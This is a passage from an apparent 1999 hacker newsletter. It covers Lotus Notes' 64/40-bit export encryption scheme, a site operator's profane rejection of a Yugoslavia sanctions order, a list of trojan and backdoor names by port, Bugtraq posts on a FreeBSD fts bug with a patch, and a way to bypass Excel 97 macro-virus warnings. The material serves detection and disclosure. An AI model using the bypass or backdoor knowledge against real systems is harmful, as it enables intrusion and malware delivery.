bad the author of this article choose to attack Lotus Notes without considering the options the US government provides. We could have just shipped 40 bit encryption like MS, Netscape, etc. and leave our international customers with weak encryption but we didn't. Oh well, you can't make everyone understand, this confusing and frustrating stuff. I hope this helps. - *** Prepared Remarks of Ray Ozzie, *** President of Iris Associates *** an affiliate of Lotus Development Corporation *** Delivered at opening of the RSA Data Security Conference '96 *** SAN FRANCISCO, Jan. 17, 1996 -- As we're all painfully aware, the U.S. government continues to maintain that cryptography should be classified and controlled as a munition of war -- and for good historical reason: Some of cryptography's finest hours have been during past wars. From the government's standpoint, the export controls implied by munitions classification must be working very well, since there has been no mass-deployed worldwide cryptography, most general communications is still in cleartext, and no world of unbreakable crypto has emerged. In the meantime, while we're preoccupied by protecting the flow of bits across borders, trouble is brewing. Criminals don't recognize borders but operate in one wild-and-wolley network. Crackers are able to attack targets halfway around the world with no fear of prosecution. Exceptionally smart people in Eastern Europe crack financial systems in New York. Everywhere you look, bright, clever people are breaking into communication systems, industrial control systems, transportation systems, health care systems -- anything and everything that's controlled by networked computers. And as you know, this isn't a theoretical problem, or just a problem with clever people stealing money from banks; it's a "clear and present danger" that's a direct result of our having moved into the information age without adequately securing our information and our global information systems. This is not just an issue of signals Intelligence or of Title III wiretaps or of lost software industry profits; this is a public safety issue. One of these days, someone is going to bring down an airliner somewhere in the world, or cause a train wreck, or destabilize an economy, by breaking into an information system through the worldwide net. And it may be something that we could have prevented, if we had been making more casual and widespread use of cryptography. And that's why I, and a number of you, spend so much time trying to change the system -- trying to educate, to help convince the U.S. Government to liberalize export controls, to allow our customers worldwide to have access to good security, to protect themselves against the threats present on the worldwide networks. To be sure, the customers are getting more and more astute. Due in large part to the press surrounding the cracking of a few 40-bit RC4 keys last year, our customers have lost confidence in 40-bit crypto. They told us that, if we were going to continue to market 40-bit Lotus Notes overseas, we should stop marketing it as a secure system -- that we should start to call it "data scrambling" or "data masking" instead of encryption. And so we have continued to lobby, arguing that the benefits of substantially better exportable crypto outweigh the risks. The government's response? Well, their latest proposal might -- in theory -- allow us to ship a 64-bit product overseas so long as it had third-party key escrow features built in. We talked to our customers about the administration's proposal, and the answer was very clear: our customers have said a resounding "no" to key escrow in Lotus Notes. They simply don't like the notion that they can't compute the additional risk and liability introduced by a third party holding the keys to unlock their data. Well, that left us in a bind. We need to provide better security for our international customers, but the government's proposal was clearly unacceptable to them. And because I didn't see a "silver bullet" solution -- or general export relief -- in the cards, I began looking for an interim solution that might allow us to ship a more secure product in the short term, while we continued to argue for substantial revision of national cryptography policy. And after months of negotiation, I'm here to announce that we have found a short-term workaround to the problem, which I hope you will find to be an interesting, new development in the area of cryptography as it pertains to export controls. While this is a very tough issue, and while I personally believe that a world of widespread cryptography is truly inevitable, the name of the game right now is to find a compromise solution that satisfies the stated needs of the U.S. Government, while still providing good information security. This is just such a compromise. Lotus Notes Release 4, which is now shipping, utilizes a new method of security that we're referring to as "Differential Workfactor Cryptography." It is a conceptually simple solution that addresses two problems at the same time: First, it protects sensitive corporate information from most malicious crackers far more effectively than previously exported products; second, it permits the government to retain its current level of access to encrypted information carried by U.S. products overseas. No more access, no less access. As you know, the U.S. government has defined its "maximum tolerance level" for exportable unescrowed cryptography at 40 bits. That is, because they generally permit the export of 40-bit products, the U.S. government is clearly already willing to deal with a 40-bit work factor in order to examine encrypted communications outside of this country. So, the system that we're shipping in Lotus Notes Release 4 overseas is one that presents different work factors to different parties, hence the name. Against crackers -- against the run-of-the-mill adversary trying to break a message -- the work factor is 64 bits, just like it is in the U.S. That is, in the new International Edition of Lotus Notes, bulk data keys are now 64 bits just as they are in our North American Edition that's sold in the U.S. and Canada. But when the U.S. Government needs access to a communications stream overseas encoded by the international edition of Lotus Notes, they are no worse off - and no better off - than they are today - they have to crack 40 bits. So how can this be true, when the work factor is 64 bits for non-governmental adversaries? It's pretty simple. We asked the government to generate a special RSA key pair, and to make known their RSA Public Key. We asked them to keep their private key classified, compartmentalized -- as secret as they'd keep the keys to their own military and diplomatic communication systems -- and to never disclose it to anyone. Then, we changed Notes so that whenever the product generates an encrypted 64-bit bulk data key, bound to that key is a small package -- a "workfactor reduction field" -- containing 24 bits of the bulk data key encrypted with the U.S. government's public key. So the U.S. government has exclusive access to 24 of the 64 bits. That's 64 bits against the cracker, 40 bits for the government. And, of course, this version of Notes is fully interoperable with the North American Edition of Notes, the only version that we sell in the United States. In the North American Edition, as always, keys generated for communications within the U.S. and Canada aren't subject to any kind of work factor reduction. And both the North American Edition and the International Edtion are shipping today. We are very pleased that we are now able to offer this increased level of security to our overseas customers. And I encourage you out there -- product designers and developers who are in a similar bind -- to offer stronger confidentiality features to your customers in your exported products by taking advantage of our already having negotiated export approval for this Differential Workfactor implementation. But please make no mistake about it: We fully recognize that this is a compromise solution. This is not a panacea. This is not the "silver bullet" that addresses all needs. We continue to argue vigorously that global and national economic security, domestic law enforcement related to Information security crimes, and personal privacy concerns would all be served well by the rapid and broad, worldwide proliferation of good, strong, high-grade cryptography. And we continue to push for a complete and public review of national cryptography policy. But we relish the fact that, in today's highly-charged political climate surrounding the issue of cryptography, we were able to negotiate a solution that increases information security for our worldwide customers. By throwing another potential solution into the mix -- by leading the way for others by clearing its export approval -- we hope that this stirs debate related to national cryptography policy. A debate that is both global and local in nature; a debate that, with your help, we can hopefully bring to the attention of the U.S Public. Updated: 01/17/96 01:14:15 PM *** *** White Paper by Charlie Kaufman, distributed at the RSA '96 conference *** Differential Workfactor Cryptography Charlie Kaufman Security Architect Iris Associates January 17, 1996 Abstract: This document describes the technical approach behind the exportable strong cryptography included in Lotus Notes Release 4 (International Edition). Current U.S. export regulations generally prohibit the export of cryptographic software that uses keys larger than 40 bits, but advances in processor technology make 40 bit keys breakable by exhaustive search practical for a growing collection of potential attackers. In a novel scheme we sometimes refer to as 64/40, we provide the cryptographic strength of 64 bit keys against most attackers while to comply with export regulations we make the workfactor for breaking the system equivalent to only 40 bits for the U.S. government. We do that by encrypting 24 of the 64 bits under a public RSA key provided by the U.S. government and binding the encrypted partial key to the encrypted data. Background: As we're all painfully aware, the U.S. government continues to maintain that cryptography should be classified and controlled as a munition of war. There is a long historical basis for this - some of cryptography's finest hours have been during the wars of the past. And while some would argue that export controls are a sham because many foreign governments impose no such restrictions and we participate in an international marketplace, by one very important measure export controls have been a success: no mass-deployed worldwide cryptography has emerged and most general communications is still in cleartext. But while the government has been successfully defending its ability to spy, trouble has been brewing. Criminals don't recognise borders - there's only one wild and wooly network. Crackers are able to attack targets halfway around the world with no fear of prosecution. Smart people in Eastern Europe crack financial systems in New York. Everywhere you look, bright clever people are breaking into communication systems, industrial control systems, transportation systems, health care systems, anything and everything that's controlled by networked computers. This is not a theoretical problem, or just a problem with clever people stealing money from banks; it's a clear and present danger that's a direct result of the fact that we've moved into the information age without adequately securing our global information systems. Lotus Notes has been a pioneer in providing transparent strong RSA based cryptography in its product offering. It went to great lengths to provide the strongest protection legally permissable. There is an International Edition that complies with export regulations and a domestic edition that does not (called the North American Edition because it is legally available in the U.S. and Canada). In the International Edition, users use two RSA key pairs - one used to protect data integrity and authentication and another (shorter) one to protect data confidentiality because only data confidentiality key sizes are regulated by export controls. Full interoperability between the North American and International Editions is achieved by having the two ends negotiate down to the largest key size that both ends support. This design came at no small cost, but it was the only way we could deliver the best security possible to each of our customers given the existing regulatory climate. Differential Workfactor Cryptography is another innovation in the direction of giving our customers the best security we can while continuing to oppose the regulations that make the complexity necessary. How it works: The idea behind Differential Workfactor Cryptography is simple; whenever a bulk data key is created, a 64 bit random number is chosen. If the use of that key is one involving data confidentiality and the International Edition of Notes, 24 of the bits are encrypted under a public RSA key that was provided to us by the U.S. government and the result - called a Workfactor Reduction Field - is bound into the encrypted data. There is no Workfactor Reduction Field in data used only by the domestic edition of Notes, and there is none for keys that are not used for data confidentiality (e.g. those used for authentication). If an attacker wanted to break into a Notes system based on information obtained by eavesdropping, he would have to exhaustively search a 64 bit key space. Even the U.S. government would face this workfactor because there is no Workfactor Reduction Field in keys used for authentication. An attacker who wanted to read an encrypted document that was either read from a server or eavesdropped from the wire would face a 64 bit workfactor. But if the U.S. government needed to decrypt such a document it could obtain 24 of the bits using its private key and the Workfactor Reduction Field and then exhaustively search a 40 bit key space. Tamper resistance: You might wonder what's to prevent someone from deleting the Workfactor Reduction Field from a document or the setup protocol of a network connection. This is similar to the problem faced in the Clipper design to assure that the LEAF field was not removed from a conversation. In a software only implementation, it is not possible to prevent tampering entirely. The easiest form of tampering would be to smuggle the North American Edition CD out of the U.S. or pass it to someone over the Internet. The best a software implementation can do in terms of tamper resistance is to make it impossible to remove the Workfactor Reduction Field without modifying both the source of the data and the destination.. This can be done by having the destination check for the presence of the Workfactor Reduction Field and refuse to decrypt the data if it is not there or not correct. The destination can't decrypt the Workfactor Reduction Field to check it, but knowing the bulk data key and the government public key, it can regenerate the WRF and compare the result with the supplied value. RSA has the convenient property that the same value encrypted twice produces the same result; it would be somewhat more complex (but still possible) to duplicate this functionality with other public key algorithms. [Note: for this to work, the random pad that was used in creating the WRF must be delivered to the recipient of the message. For it to be secure, it must be delivered encrypted since a clever attacker who knew the pad could do 2^24 trial encryptions to get 24 bits of the key and then do 2^40 trial decryptions to recover the rest.] Frequently Asked Questions: Q: Does this mean that the International Edition of Lotus Notes Release 4 is just as secure as the North American Edition against someone who does not know the U.S. Government's key. A: Almost. There are factors other than the 64 and 40 bit secret keys. The International Edition is still limited to 512 bit RSA keys when they are used for data confidentiality. The North American Edition uses 630 bit RSA keys in this context. While 512 bit RSA keys are considerably more secure than 40 bit secret keys, they are not as secure as 64 bit keys, so in both cases it would be more cost effective to attack the RSA keys than to attack the secret keys. In considering the security of the International Edition, users must also assess the likelihood that an attacker might learn the government's private key either by breaking through the government's protective mechanisms or by breaking the single RSA key. If either were to happen, the International Edition would become only as secure as other 40 bit products. Q: Does Lotus also have a copy of the private key used to reduce the workfactor from 64 to 40 bits? A: No. The U.S. government generated the RSA key and supplied us with the public component. We never had access to the private component (which made debugging this thing a real joy!). Q: How is this scheme different from Key Escrow? A: While one goal may be the same - to provide exportable strong cryptography - there are differences with respect to security, functionality, and administrative convenience. It is more secure than Key Escrow in that even if third parties misbehave, there remains a substantial workfactor in breaking each individual message. It may be more or less secure than Key Escrow depending on the policies of the holder of the U.S. government key compared to the policies of possible Key Escrow agents. It is less functional than some Key Escrow proposals because it is impractical to use this facility to recover lost keys. And it is more administratively convenient than key escrow because there is no communication with third parties necessary as part of setup. Notes is secure 'out of the box'. Q: Does this scheme address law enforcement concerns within the U.S. (i..e. should it be considered an alternative to Clipper)? A: No. In only one way does this scheme address the Law Enforcement interests of either U.S. or foreign governments: better information security helps Law Enforcement to guard against information-related crimes. As indicated by our continuing to go to considerable expense to maintain both domestic and international editions, we continue to oppose any limits on domestic use of strong cryptography. @HWA 18.0 Packetstom Security Gets the choke order for .yu sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ execorder.txt - Last week, I received a copy of an "Executive Order" from The White House, signed by President Clinton, along with several emails informing me that it is now illegal for me to "provide any software or technology to Yugoslavia and Montenegro". In other words, I was told that I need to restrict access to this web site so that anybody from the .yu TLD could not access and download "exploits" and "hacker tools". It was suggested that I deny access to anybody using proxies, anonymizers, non-resolvable IP addresses, and of course anybody from Yugoslavia. This is absurd. Here is my "Executive Reply" to President Clinton: Fuck you and your stupid orders, Bill. THE WHITE HOUSE Office of the Press Secretary ________________________________________________________________________ For Immediate Release May 1, 1999 EXECUTIVE ORDER - - - - - - - BLOCKING PROPERTY OF THE GOVERNMENTS OF THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO), THE REPUBLIC OF SERBIA, AND THE REPUBLIC OF MONTENEGRO, AND PROHIBITING TRADE TRANSACTIONS INVOLVING THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO) IN RESPONSE TO THE SITUATION IN KOSOVO By the authority vested in me as President by the Constitution and the laws of the United States of America, including the International Emergency Economic Powers Act (IEEPA) (50 U.S.C. 1701 et seq.), the National Emergencies Act (50 U.S.C. 1601 et seq.), and section 301 of title 3, United States Code, I, WILLIAM J. CLINTON, President of the United States of America, in order to take additional steps with respect to the continuing human rights and humanitarian crisis in Kosovo and the national emergency described and declared in Executive Order 13088 of June 9, 1998, hereby order: Section 1. Amendment to Executive Order 13088. (a) Section 1(a) of Executive Order 13088 of June 9, 1998, is revised to read as follows: "Section 1. (a) Except to the extent provided in section 203(b) of IEEPA (50 U.S.C. 1702(b)), and in regulations, orders, directives, or licenses that may hereafter be issued pursuant to this order, all property and interests in property of the Governments of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Republic of Serbia, and the Republic of Montenegro that are in the United States, that hereafter come within the United States, or that are or hereafter come within the possession or control of United States persons, including their overseas branches, are hereby blocked." (b) Section 2 of Executive Order 13088 is hereby revoked, and a new section 2 is added to read as follows: "Sec. 2. Except to the extent provided in section 203(b) of IEEPA (50 U.S.C. 1702(b)) and in regulations, orders, directives, or licenses that may hereafter be issued pursuant to this order, and notwithstanding any contract entered into or any license or permit granted prior to the effective date of this order, the following are prohibited: "(a) the exportation, reexportation, sale, or supply, directly or indirectly, from the United States, or by a United States person, wherever located, to the Federal Republic of Yugoslavia (Serbia and Montenegro) or the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro, of any goods (including petroleum and petroleum products), software, technology (including technical data), or services; "(b) the importation into the United States, directly or indirectly, of any goods, software, technology (including technical data), or services from the Federal Republic of Yugoslavia (Serbia and Montenegro) or owned or controlled by the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro; and "(c) any transaction or dealing by a United States person, wherever located, in goods, software, technology (including technical data), or services, regardless of country of origin, for exportation, reexportation, sale, or supply to, or exportation from or by, the Federal Republic of Yugoslavia (Serbia and Montenegro) or the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro. This prohibition includes, without limitation, purchase, sale, transport, swap, or brokerage transactions in such items, and approving, financing, insuring, facilitating, or guaranteeing any such transactions." (c) Section 4 of Executive Order 13088 is revised to read as follows: "Sec. 4. Any transaction by a United States person that evades or avoids, or has the purpose of evading or avoiding, or attempts to violate, any of the prohibitions set forth in this order is prohibited. Any conspiracy formed to violate the prohibitions of this order is prohibited." (d) Section 7 of Executive Order 13088 is revised to read as follows: "Sec. 7. (a) The Secretary of the Treasury, in consultation with the Secretary of State, shall give special consideration to the circumstances of the Government of the Republic of Montenegro and persons located in and organized under the laws of the Republic of Montenegro in the implementation of this order. "(b) The Secretary of the Treasury, in consultation with the Secretary of State, shall give special consideration to the humanitarian needs of refugees from Kosovo and other civilians within the Federal Republic of Yugoslavia (Serbia and Montenegro) in the implementation of this order. "(c) The Secretary of the Treasury, in consultation with the Secretary of State, is hereby directed to authorize commercial sales of agricultural commodities and products, medicine, and medical equipment for civilian end use in the territory of the Federal Republic of Yugoslavia (Serbia and Montenegro) under appropriate safeguards to prevent diversion to military, paramilitary, or political use by the Government of the Federal Republic of Yugoslavia (Serbia and Montenegro), the Government of the Republic of Serbia, or the Government of the Republic of Montenegro." Sec. 2. Preservation of Authorities. Nothing in this order is intended to affect the continued effectiveness of any rules, regulations, orders, licenses, or other forms of administrative action issued, taken, or continued in effect heretofore or hereafter under the authority of IEEPA, except as hereafter terminated, modified, or suspended by the issuing Federal agency. Sec. 3. No rights or privileges conferred. Nothing contained in this order shall confer any substantive or procedural right or privilege on any person or organization, enforceable against the United States, its agencies or its officers. Sec. 4. (a) Effective date. This order is effective at 12:01 a.m. eastern daylight time on May 1, 1999. (b) Transmittal; Publication. This order shall be transmitted to the Congress and published in the Federal Register. WILLIAM J. CLINTON THE WHITE HOUSE, April 30, 1999. # # # @HWA 19.0 Common Trojans and the ports they can be found on ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml After seeing several questions about traffic directed at ports as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack´99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future). To help anyone to detect trojan attacks, I´m planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I´ll love to get my hands on them, but please mail me first, as I don´t need more than one copy. If you have live experiance of trojan attacks I´m interested to read about your findings. Joakim joakim.von.braun@risab.se @HWA 20.0 Fts_read vulnerabilty provides root compromise in FreeBSD find, du ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 14:32:42 +0400 From: Stas Kisel To: BUGTRAQ@netspace.org Subject: fts, du, find Hi. I use FreeBSD-2.2.8 and FreeBSD-2.2.7 and I know that these versions are no longer supported, but: 1. There are many people still using 2.2 2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other. Approximately a month ago I've found a very strange behaviour of 'du' with long direstory structures. I left this alone due to lack of time, but some days ago I saw an article on bugtraq concerning similar behaviour of 'find'. There is a one bug in libc causing this behaviour. I have a patch, but I did not tested it much ;) Both 'find' and 'du' use 'fts' (fts_read,...) functions to traverse directory structure. fts uses realloc() to reallocate memory in quite complex lists. There is a bug in adjusting pointers after realloc(). So when dealing with large directory structures (when realloc() needed), some pointers can point to free()-ed memory. I have no exploit and probably will no have a free time (I think 3 days is more than enough) for doing it, but I beleive it is possible to exploit this bug using carefully designed directory tree to execute arbitrary commands as root during /etc/daily->/etc/security->find. REMOTE ROOT EXPLOIT (POSSIBLE). At least it is possible to hide setuid binary this way in home dir or in /tmp. The following patch is designed for FreeBSD-2.2.8-RELEASE libc. There was the following ID in the beginning of the source file. /* $OpenBSD: fts.c,v 1.9 1997/08/02 00:13:49 millert Exp $ */ I've only tested this patch on one machine during one day, so it is probably buggy. If you'll apply this patch, please drop me a line if there was any side effect and I'll do a followup in the bugtraq, say, on the Friday. ------------------ patch ---------------------------------------- --- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999 +++ /usr/src/lib/libc/gen/fts.c Wed May 12 13:16:08 1999 @@ -740,8 +740,26 @@ * If had to realloc the path, adjust the addresses for the rest * of the tree. */ - if (adjaddr) + if (adjaddr){ fts_padjust(sp, adjaddr); + /* Adjust the list, because we want to return it robust. */ +/* fix p->fts_path and p->fts_accpath + p->fts_accpath can be: + either cur->fts_path (adjust, because cur is already adjusted) + either p->fts_path (adjust) + either p->fts_name (do not adjust) + I'm also almost sure that in first case cur->fts_path=p->fts_path... +*/ +#define ADJUST1(p) if((p)->fts_path != adjaddr){ \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\ + } \ + (p)->fts_path = adjaddr; \ +} + for (p = head; p; p = p->fts_link) + ADJUST1(p); + } /* * If not changing directories, reset the path back to original @@ -974,18 +992,18 @@ { FTSENT *p; -#define ADJUST(p) { \ +#define ADJUST2(p) { \ (p)->fts_accpath = \ (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ (p)->fts_path = addr; \ } /* Adjust the current set of children. */ for (p = sp->fts_child; p; p = p->fts_link) - ADJUST(p); + ADJUST2(p); /* Adjust the rest of the tree. */ for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) { - ADJUST(p); + ADJUST2(p); p = p->fts_link ? p->fts_link : p->fts_parent; } } ------------------ endpatch ---------------------------------------- -- Stas Kisel Open Tavrical College Sysadmin stas@sonet.crimea.ua Simferopol State University Web-designer stas@ccssu.crimea.ua ------------------------------------------------------------------------------------------ Date: Fri, 14 May 1999 04:33:34 -0400 From: Jordan Ritter To: BUGTRAQ@netspace.org Subject: Re: fts, du, find On Wed, 12 May 1999, Stas Kisel wrote: > 2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other. I found this back a few months ago when working on the wu-ftp stuff.. OpenBSD definitely has the same problem. last thing I remember thinking was that it was dying because realloc() was failing (as the fts stuff realloc()'s memory as the path grows) .. Jordan Ritter Network Security Engineer Netect/Bindview Corp Boston, MA "Quis custodiet ipsos custodes?" ------------------------------------------------------------------------------------------ Date: Fri, 14 May 1999 14:37:03 +0400 From: Stas Kisel To: BUGTRAQ@netspace.org Subject: Re: fts...(improved patch) > From: Jordan Ritter > OpenBSD definitely has the same problem. last thing I remember thinking > was that it was dying because realloc() was failing (as the fts stuff > realloc()'s memory as the path grows) .. fts realloc (pathlen+~1000b) of memory only, so realloc succeds. The bug is in the adjusting pointers after realloc(). Next day after sending patch I've found another circumstanses that triggered similar bug in fts. This time some pointers were adjusted which did not belong to realloc()-ed memory chunk. Improved patch is below. Sorry for inconvenience. Probably there are some similar bugs in fts code or patch. Please let me know if you'll see any. \bye Stas ----------------------------- patch ---------------------------------- --- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999 +++ /usr/src/lib/libc/gen/fts.c Fri May 14 14:02:58 1999 @@ -740,8 +740,26 @@ * If had to realloc the path, adjust the addresses for the rest * of the tree. */ - if (adjaddr) + if (adjaddr){ fts_padjust(sp, adjaddr); + /* Adjust the list, because we want to return it robust. */ +/* fix p->fts_path and p->fts_accpath + p->fts_accpath can be: + either cur->fts_path (adjust, because cur is already adjusted) + either p->fts_path (adjust) + either p->fts_name (do not adjust) + I'm also almost sure that in first case cur->fts_path=p->fts_path... +*/ +#define ADJUST1(p) if((p)->fts_path != adjaddr){ \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\ + } \ + (p)->fts_path = adjaddr; \ +} + for (p = head; p; p = p->fts_link) + ADJUST1(p); + } /* * If not changing directories, reset the path back to original @@ -974,18 +992,20 @@ { FTSENT *p; -#define ADJUST(p) { \ - (p)->fts_accpath = \ - (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ +#define ADJUST2(p) { \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ + } \ (p)->fts_path = addr; \ } /* Adjust the current set of children. */ for (p = sp->fts_child; p; p = p->fts_link) - ADJUST(p); + ADJUST2(p); /* Adjust the rest of the tree. */ for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) { - ADJUST(p); + ADJUST2(p); p = p->fts_link ? p->fts_link : p->fts_parent; } } ----------------------------- /patch ---------------------------------- ------------------------------------------------------------------------------------------ Date: Fri, 14 May 1999 19:14:02 +0200 From: Przemyslaw Frasunek Reply-To: venglin@lagoon.freebsd.org.pl To: BUGTRAQ@netspace.org Subject: Re: fts, du, find > 2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other. Yes, I've tested it on 3.1-STABLE. > I have no exploit and probably will no have a free time (I think > 3 days is more than enough) for doing it, but I beleive it is > possible to exploit this bug using carefully designed directory > tree to execute arbitrary commands as root during > /etc/daily->/etc/security->find. > REMOTE ROOT EXPLOIT (POSSIBLE). I think, that it will be hard to write an exploit. I've tested it on my 2.2.8-RELEASE at home. 'Find' segfaults, when it tries to do: (void)puts(entry->fts_path); because of junk pointer to structure 'entry'. IMHO it _always_ points to 0x200291d6, so it tries to execute (IMHO) _always_ the same commands: 0x200291d6 : repnz scasb %es:(%edi),%al 0x200291d7 : scasb %es:(%edi),%al 0x200291d8 : movl %ecx,%eax 0x200291d9 : enter $0xd0f7,$0x89 0x200291da : notl %eax 0x200291db : rorb 0x488de455(%ecx) 0x200291dc : movl %edx,0xffffffe4(%ebp) 0x200291dd : pushl %ebp 0x200291de : inb $0x8d,%al 0x200291df : leal 0xffffffff(%eax),%ecx 0x200291e0 : decl %eax 0x200291e1 : decl 0x938de84d(%ecx) 0x200291e2 : movl %ecx,0xffffffe8(%ebp) 0x200291e3 : decl %ebp 0x200291e4 : call 0xc1532576 and here it segfaults. -- * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 * * Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF * @HWA 21.0 Excel Macro Virus protection patch has a hole ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 13 May 1999 16:12:48 -0400 From: rotaiv To: BUGTRAQ@netspace.org Subject: Re: Microsoft Security Bulletin (MS99-014) -----BEGIN PGP SIGNED MESSAGE----- This is in response to the Microsoft Security Bulletin (MS99-014). On 3/29/99 I posted a message to BugTraq titled, "Bypassing Excel Macro Virus Protection". The message explained two ways to bypass the "Macro Virus Protection" option in Excel 97. One is to password protect an infected spreadsheet (Q176640) and the second is to copy an infected spreadsheet into the XLSTART directory (Q180614). Both methods will open an infected spreadsheet without the macro warning appearing. I would love to think Microsoft Security Bulletin (MS99-014) was in response to my email but I'll be humble and chalk it up to coincidence. I downloaded the patch to see if addressed the two scenarios I described above. I found that you will now receive the macro warning on a password protected file but not on a file copied to the XLSTART directory. Also, you can still enable or disable the macro virus protected with a simple reg hack. I guess that is not so important because if you can perform a reg hack, you can do a lot more than execute an Excel macro. I am not sure what really prompted Microsoft to release a patch for Excel but I find it surprising that they did not address the XLSTART option either. They should at least give us the option of deciding if this directory is trusted, thereby by-passing the macro virus warning. 'nuff said. rotaiv -Ł- -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 iQEVAwUBNzsxdQuGSvRTfa2rAQHe+Af+NXzCRMZ6ALIsiezLQ5XhOuBgmRZALeoO k2LMkGfVea8jO7olA/wtwnrS2E0eCUVSMW23ZSxkd8Q9hbYBxbc8GvPOzOTGL4EP tmZkyvxcB2QyyDmJjIQuJQKcGCggr0ahPNr9pvv9DsBHJeRifcS6niXZrm5uQJb7 qhY4QJzAWQ9cXEiqoNuTofgR1eg276MUSuh2Om29FIjkfcMocdGghrkQLBGvN9MB Hlm9Z7D0I3/zT88c+A6IeyZHbe9/6PaAODgn3QuhKla8PbetyGj/Qbclua5kNR/X tVoLWIIrcA2ZKsgQn1SLtcKTqDV5KPTGrz3yB1ZH9BJ37qmXLOegfw== =qJ15 -----END PGP SIGNATURE----- @HWA 22.0 Possible root compromise when installing new SSHD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 10 May 1999 22:26:19 +0200 >From: "GWDVMS::MOELLER" Subject: Risks of upgrading a UNIX system When was the last time you rebuilt all privileged (`suid root') applications when upgrading a unix system, just in case? I'm pretty sure one can find `small print' that demands this, however I'm equally sure that hardly any system manager does so, since problems seem to occur _very_ rarely. Here's a neat one: Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a not-so-common platform (nothing really security-relevant, machine used for raw speed only, users just being accustomed to that sort of login). Said platform (featuring a particularly elaborate user data base) requires some special calls (simple calling sequences) to be done during `login' - no problem, `sshd' knows about them, although not explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not allow `root' logins from the outside. What other harm could it possibly do? Upgrade has to occur somewhat in a hurry, release documentation isn't 